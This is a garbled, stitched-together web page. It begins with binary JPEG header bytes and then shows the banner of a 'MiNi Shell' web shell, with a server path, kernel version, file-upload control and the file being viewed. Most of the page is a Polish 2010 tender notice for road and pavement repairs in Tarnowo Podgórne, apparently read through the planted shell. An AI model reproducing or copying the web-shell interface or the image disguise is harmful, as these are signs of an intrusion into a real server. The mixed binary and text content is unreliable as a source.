JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100420/111890-N-2010.html

<p class="kh_header"><b>Tarnowo Podgórne: Remonty nawierzchni dróg, chodników i wjazdów na terenie gminy Tarnowo Podgórne</b><br>
<b>Numer ogłoszenia: 111890 - 2010; data zamieszczenia: 20.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Tarnowo Podgórne , ul. Poznańska 115, 62-080 Tarnowo Podgórne, woj. wielkopolskie, tel. 061 8146-221, faks (061) 814 61 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> Tarnowo_Pdg_ZP@wokiss.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty nawierzchni dróg, chodników i wjazdów na terenie gminy Tarnowo Podgórne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont nawierzchni dróg, chodników i wjazdów  na terenie gminy Tarnowo Podgórne.
Przedmiot zamówienia został podzielony na 3 części.
Cześć I 
Remont nawierzchni dróg, chodników i wjazdów w  rejonie  pl. Harcerskiego III  
ul. Bukowska  i  Jankowicka  w Ceradzu Kościelnym
       
       Przedmiotem  zamówienia  jest  wykonanie  następujących  elementów:

-	korytowanie  trasy  pod  chodniki  i  wjazdy  z  profilowaniem  i  zagęszczaniem  
      podłoża - 1.042,0 m2
-    podbudowa z betonu  Rm =  5,0  MPa   gr. 10  cm - chodniki  - 518,0 m2
-    podbudowa  z  tłucznia  kamiennego  gr. 20  cm - wjazdy  - 281,0 m2
-    podbudowa  z  tłucznia  kamiennego  gr.20 cm - jezdnia  / pachwiny /  - 210,0  m2
-    wjazdy  z  kostki  brukowej, szarej  grub. 8  cm - 281.0 m2
-    nawierzchnia  ulicy  z  asfaltobetonu  grub. 10  cm    - 210,0 m2
-    chodniki  z  kostki  brukowej  szarej, grub. 6  cm - 518,0 m2
-    montaż  krawężnika  drogowego  o  wym. 15 x 30 x 100  cm   - 300,0 mb
-    montaż  opornika  betonowego  o  wym..6 x 30 x 100  cm - 44,0 mb
-    montaż  opornika  betonowego  o  wym. 8x30x100  cm  - 506,0
-    regulacja  studni  kanalizacyjnych  i  telekomunikacyjnych  - 3,0 szt.
-    regulacja  zasuw  wodociągowych  - 5,0 szt.
-    przykanaliki  z  rur  PCV  śr. 100  mm - 6,0 mb
-   ściek  liniowy  Aco  typ  ciężki   - kpl. 2,0 / po  2  mb

Zakres rzeczowy zadania będącego przedmiotem przetargu  opisany jest szczegółowo 
w opisie technicznym, specyfikacji technicznej i przedmiarze robót. Ewentualne pozycje katalogowe podano wyłącznie dla ułatwienia sporządzenia kalkulacji - stosowanie ich do wyceny nie jest obligatoryjne   Specyfikacja techniczna, przedmiar robót i opis techniczny stanowi załącznik do niniejszej specyfikacji.

Zamawiający wymaga by przedmiot zamówienia był objęty 36 miesięczna gwarancją i rękojmią.
Wykonawca sporządzi dokumentację powykonawczą.
Wykonawca musi wskazać w ofercie, które elementy zamówienia zamierza powierzyć do wykonania podwykonawcom. 


Do obowiązku i na koszt Wykonawcy należy także: 
a)	badanie  zagęszczenia  zasypki  wykopów  tymczasowych  w  dostosowaniu                     wymogów  projektu  technicznego  i  klasy  drogi ( pasa  roboczego ).
b)	opłaty  składowiskowe  związane  z  odwozem  gruzu  i  nadmiarem  urobku.
c)	opłaty  za  czasowe  składowiska  urobku.
d)	 naprawy  dróg  i  ulic  zniszczonych  w  czasie  trwania  robót  przez  środki  transportu  i  maszyny  budowlane, zatrudnione  na  budowie  oraz  pojazdy  korzystające z  objazdów.
e)	likwidację  skutków  oddziaływania  procesu  budowlanego  na  otoczenie  budowy.
f)	koszty wycięcia drzew i krzewów
g)	pełną  obsługę geodezyjną  z  inwentaryzacją  powykonawczą  włącznie
h)	koszty  oznakowania  terenu  robót  na  okres  budowy  
i)	koszty  zastosowania  krawężników  łukowych  na  skrzyżowaniach.

Wykonawca zastosuje materiały o parametrach technicznych, konstrukcyjnych 
i użytkowych nie gorszych od podanych w specyfikacji technicznej i opisie technicznym.

Cześć II 
Remont  nawierzchni  ulicy  Otowskiej    w  L u s ó w k u
       
Przedmiotem  zamówienia  jest  wykonanie  następujących  elementów:

-	korytowanie  trasy  pod  nawierzchnię  ulicy, chodnika  i  wjazdów  z  profilowaniem  
     i  zagęszczaniem  podłoża - 1.595,0 m2
-    warstwa  stabilizacji  z  piasku  i  cementu  Rm = 2,5  MPa,  gr. 10 cm. - 885,0 m2
-    podbudowa  z  tłucznia  kamiennego  gr. 20  cm - ulica  i  wjazdy  - 1.485,0 m2
-    podbudowa  z  mieszanki  cem.- piask. Rm = 5,0 MPa   gr. 10 cm,
     chodnik  - 110,0 m2
-    nawierzchnia  z  betonu  asfaltowego  gr. 6  cm  - 4.100,0 m2
-    nawierzchnia  z  kostki  betonowej  gr. 6  cm, szara  -  chodnik  - 110,0 m2
-    nawierzchni  z  kostki  betonowej  gr. 8  cm, szarej   -  wjazdy - 600,0 m2
-    montaż  krawężnika  drogowego  o  wym. 15x30x100  mm - 155,0 mb
-    montaż  opornika  betonowego  o  wym. 10x30x100  mm - 1.168,0 mb
-    plantowanie  pobocza  - 950,0 m2
-    przykanaliki  z  rur  z  tworzyw  sztucznych, dwuściennych, śr. 200  mm  - 45,0 mb
-    studnia  kanalizacyjna  z  kręgów  betonowych  śr. 1000  mm, - 2,0 szt.,  gł. 2,0  m.
-    studzienka  ściekowa  z  kręgów  betonowych  śr. 500  mm  z osadnikiem - 3,0 szt.
-   ściek  liniowy  ACO  typ  ciężki - 3,0 mb

Zakres rzeczowy zadania będącego przedmiotem przetargu  opisany jest szczegółowo 
w opisie technicznym, specyfikacji technicznej i przedmiarze robót. Ewentualne pozycje katalogowe podano wyłącznie dla ułatwienia sporządzenia kalkulacji - stosowanie ich do wyceny nie jest obligatoryjne   Specyfikacja techniczna, przedmiar robót i opis techniczny stanowi załącznik do niniejszej specyfikacji.

Zamawiający wymaga by przedmiot zamówienia był objęty 36 miesięczna gwarancją i rekojmią
Wykonawca sporządzi dokumentację powykonawczą.
Wykonawca musi wskazać w ofercie, które elementy zamówienia zamierza powierzyć do wykonania podwykonawcom. 


Do obowiązku i na koszt Wykonawcy należy także: 
a)	badanie  zagęszczenia  zasypki  wykopów  tymczasowych  w  dostosowaniu                     wymogów  projektu  technicznego  i  klasy  drogi ( pasa  roboczego ).
b)	opłaty  składowiskowe  związane  z  odwozem  gruzu  i  nadmiarem  urobku.
c)	opłaty  za  czasowe  składowiska  urobku.
d)	naprawy  dróg  i  ulic  zniszczonych  w  czasie  trwania  robót  przez  środki  transportu  i  maszyny  budowlane, zatrudnione  na  budowie  oraz  pojazdy  korzystające z  objazdów.
e)	likwidację  skutków  oddziaływania  procesu  budowlanego  na  otoczenie  budowy.
f)	koszty wycięcia drzew i krzewów
g)	pełną  obsługę geodezyjną  z  inwentaryzacją  powykonawczą  włącznie
h)	koszty  oznakowania  terenu  robót  na  okres  budowy  

Wykonawca zastosuje materiały o parametrach technicznych, konstrukcyjnych 
i użytkowych nie gorszych od podanych w specyfikacji technicznej i opisie technicznym.

Cześć III 
Remont  nawierzchni  ulicy  Prostej  L u s ó w k o -  S i e r o s ł a w
      
Przedmiotem  zamówienia  jest  wykonanie  następujących  elementów:

-	korytowanie  trasy  pod  nawierzchnię  i  wjazdy  z  profilowaniem  i zagęszczaniem         
     podłoża  -11.470,0  m2
-    warstwa  wyrównawcza  z  piasku  - nasypy  - 943,8 m3
-    podbudowa  z  tłucznia  kamiennego  gr. 20  cm - ulica   - 9.250,0 m2
-    podbudowa  z  tłucznia  kamiennego  gr. 25  cm - pasy  pobocza - 2.220,0 m2
-    nawierzchnia  z  betonu  asfaltowego  gr. 6  cm   - 9.250,0 m2
-    montaż  krawężnika  drogowego  o  wym. 15x30x100  mm  - 10,0 mb
-    montaż  opornika  betonowego  o  wym. 8x30x100  mm - 3.700,0 mb
-    plantowanie  pobocza  - 2.590,0 m2

Zakres rzeczowy zadania będącego przedmiotem przetargu  opisany jest szczegółowo 
w opisie technicznym, specyfikacji technicznej i przedmiarze robót. Ewentualne pozycje katalogowe podano wyłącznie dla ułatwienia sporządzenia kalkulacji - stosowanie ich do wyceny nie jest obligatoryjne   Specyfikacja techniczna, przedmiar robót i opis techniczny stanowi załącznik do niniejszej specyfikacji.

Zamawiający wymaga by przedmiot zamówienia był objęty 36 miesięczna gwarancją i rękojmią.
Wykonawca sporządzi dokumentację powykonawczą.
Wykonawca musi wskazać w ofercie, które elementy zamówienia zamierza powierzyć do wykonania podwykonawcom. 

Do obowiązku i na koszt Wykonawcy należy także: 
a)	badanie  zagęszczenia  zasypki  wykopów  tymczasowych  w  dostosowaniu                     wymogów  projektu  technicznego  i  klasy  drogi ( pasa  roboczego ).
b)	opłaty  składowiskowe  związane  z  odwozem  gruzu  i  nadmiarem  urobku.
c)	opłaty  za  czasowe  składowiska  urobku.
d)	 naprawy  dróg  i  ulic  zniszczonych  w  czasie  trwania  robót  przez  środki  transportu  i  maszyny  budowlane, zatrudnione  na  budowie  oraz  pojazdy  korzystające z  objazdów.
e)	likwidację  skutków  oddziaływania  procesu  budowlanego  na  otoczenie  budowy.
f)	koszty  wycinki drzew i krzewów
g)	pełną  obsługę geodezyjną  z  inwentaryzacją  powykonawczą  włącznie
h)	koszty  oznakowania  terenu  robót  na  okres  budowy  

Wykonawca zastosuje materiały o parametrach technicznych, konstrukcyjnych 
i użytkowych nie gorszych od podanych w specyfikacji technicznej i opisie technicznym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających polegających na powtórzeniu robót objętych zamówieniem podstawowym do wartości 50%  zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.00-0, 45.23.21.30-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca, przed upływem terminu składania ofert musi wnieść wadium o wartości:
Część I  - zamawiający nie wymaga wniesienia wadium
Część II - 5.000,00 zł.  (słownie: pięć tysięcy złotych)
Część III - 10.000,00 zł.  (słownie: dziesięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest doświadczenie zawodowe w zakresie realizacji prac porównywalnych z przedmiotem zamówienia (udokumentują wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, co najmniej 2 robót związanych z budowa lub przebudową dróg o wartości minimum:
- część I -  150.000 zł brutto każda
- część II -  500.000 zł brutto każda
- część III -  1.000.000 zł brutto każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest zapewnienie nadzoru kierownika budowy posiadającego stosowne uprawnienia budowlane wraz z potwierdzeniem przynależności do izby zawodowej techników i inżynierów budownictwa (wymagane uprawnienia drogowe oraz w przypadku części I i II dodatkowo kanalizacyjne ) - do oferty wykonawca składa oświadczenie w formie wykazu wg wzoru załączonego do siwz, przed podpisaniem umowy wybrany wykonawca zobowiązany jest przedstawić dokumenty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>kosztorys ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ewentualna zmiana terminu może nastąpić tylko w przypadku, gdy warunki pogodowe uniemożliwią prowadzenie robót budowlanych co zostanie potwierdzone wpisem do dziennika budowy lub gdy wystąpią roboty dodatkowe od których uzależnione będzie wykonanie zamówienia podstawowego.

Zamawiający dopuszcza zmianę kierownika budowy w przypadku takiej konieczności wynikającej  z obiektywnych okoliczności. Kierownik budowy musi posiadać uprawnienia wymagane przepisami prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tarnowo-podgórne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego pok. 117.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2010 godzina 10:00, miejsce: siedziba zamawiajacego pok. 119.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Cześć I 
Remont nawierzchni dróg, chodników i wjazdów w  rejonie  pl. Harcerskiego III  
ul. Bukowska  i  Jankowicka  w Ceradzu Kościelnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest  wykonanie  następujących  elementów:

-	korytowanie  trasy  pod  chodniki  i  wjazdy  z  profilowaniem  i  zagęszczaniem  
      podłoża - 1.042,0 m2
-    podbudowa z betonu  Rm =  5,0  MPa   gr. 10  cm - chodniki  - 518,0 m2
-    podbudowa  z  tłucznia  kamiennego  gr. 20  cm - wjazdy  - 281,0 m2
-    podbudowa  z  tłucznia  kamiennego  gr.20 cm - jezdnia  / pachwiny /  - 210,0  m2
-    wjazdy  z  kostki  brukowej, szarej  grub. 8  cm - 281.0 m2
-    nawierzchnia  ulicy  z  asfaltobetonu  grub. 10  cm    - 210,0 m2
-    chodniki  z  kostki  brukowej  szarej, grub. 6  cm - 518,0 m2
-    montaż  krawężnika  drogowego  o  wym. 15 x 30 x 100  cm   - 300,0 mb
-    montaż  opornika  betonowego  o  wym..6 x 30 x 100  cm - 44,0 mb
-    montaż  opornika  betonowego  o  wym. 8x30x100  cm  - 506,0
-    regulacja  studni  kanalizacyjnych  i  telekomunikacyjnych  - 3,0 szt.
-    regulacja  zasuw  wodociągowych  - 5,0 szt.
-    przykanaliki  z  rur  PCV  śr. 100  mm - 6,0 mb
-   ściek  liniowy  Aco  typ  ciężki   - kpl. 2,0 / po  2  mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.00-0, 45.23.21.30-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cześć II 
Remont  nawierzchni  ulicy  Otowskiej    w  Lusówku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest  wykonanie  następujących  elementów:

-	korytowanie  trasy  pod  nawierzchnię  ulicy, chodnika  i  wjazdów  z  profilowaniem  
     i  zagęszczaniem  podłoża - 1.595,0 m2
-    warstwa  stabilizacji  z  piasku  i  cementu  Rm = 2,5  MPa,  gr. 10 cm. - 885,0 m2
-    podbudowa  z  tłucznia  kamiennego  gr. 20  cm - ulica  i  wjazdy  - 1.485,0 m2
-    podbudowa  z  mieszanki  cem.- piask. Rm = 5,0 MPa   gr. 10 cm,
     chodnik  - 110,0 m2
-    nawierzchnia  z  betonu  asfaltowego  gr. 6  cm  - 4.100,0 m2
-    nawierzchnia  z  kostki  betonowej  gr. 6  cm, szara  -  chodnik  - 110,0 m2
-    nawierzchni  z  kostki  betonowej  gr. 8  cm, szarej   -  wjazdy - 600,0 m2
-    montaż  krawężnika  drogowego  o  wym. 15x30x100  mm - 155,0 mb
-    montaż  opornika  betonowego  o  wym. 10x30x100  mm - 1.168,0 mb
-    plantowanie  pobocza  - 950,0 m2
-    przykanaliki  z  rur  z  tworzyw  sztucznych, dwuściennych, śr. 200  mm  - 45,0 mb
-    studnia  kanalizacyjna  z  kręgów  betonowych  śr. 1000  mm, - 2,0 szt.,  gł. 2,0  m.
-    studzienka  ściekowa  z  kręgów  betonowych  śr. 500  mm  z osadnikiem - 3,0 szt.
-   ściek  liniowy  ACO  typ  ciężki - 3,0 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.00-0, 45.23.21.30-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cześć III 
Remont  nawierzchni  ulicy  Prostej  Lusówko -  Sierosław.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest  wykonanie  następujących  elementów:

-	korytowanie  trasy  pod  nawierzchnię  i  wjazdy  z  profilowaniem  i zagęszczaniem         
     podłoża  -11.470,0  m2
-    warstwa  wyrównawcza  z  piasku  - nasypy  - 943,8 m3
-    podbudowa  z  tłucznia  kamiennego  gr. 20  cm - ulica   - 9.250,0 m2
-    podbudowa  z  tłucznia  kamiennego  gr. 25  cm - pasy  pobocza - 2.220,0 m2
